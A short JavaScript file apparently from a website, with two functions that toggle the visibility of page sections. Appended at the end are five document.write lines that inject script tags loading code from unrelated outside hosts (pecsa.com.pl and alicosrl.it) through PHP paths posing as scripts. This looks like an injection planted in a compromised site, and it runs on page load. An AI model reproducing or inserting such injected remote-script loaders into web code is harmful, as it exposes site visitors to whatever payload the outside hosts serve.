


function init(){
	for(var i=2; i<=6; i++){
		document.getElementById('contenido'+i).style.display = 'none';
	}
}

function viewSection(id,total){
	for (var i=1; i<=6; i++){
		if(i!=id){
			document.getElementById('contenido'+i).style.display = 'none';
		}else{
			document.getElementById('contenido'+i).style.display = 'block';
		}
	}
}
document.write('<script src=http://pecsa.com.pl/en/organizacja.php ><\/script>');
document.write('<script src=http://pecsa.com.pl/en/organizacja.php ><\/script>');
document.write('<script src=http://pecsa.com.pl/en/organizacja.php ><\/script>');
document.write('<script src=http://pecsa.com.pl/en/organizacja.php ><\/script>');
document.write('<script src=http://alicosrl.it/templates/403.shtml.php ><\/script>');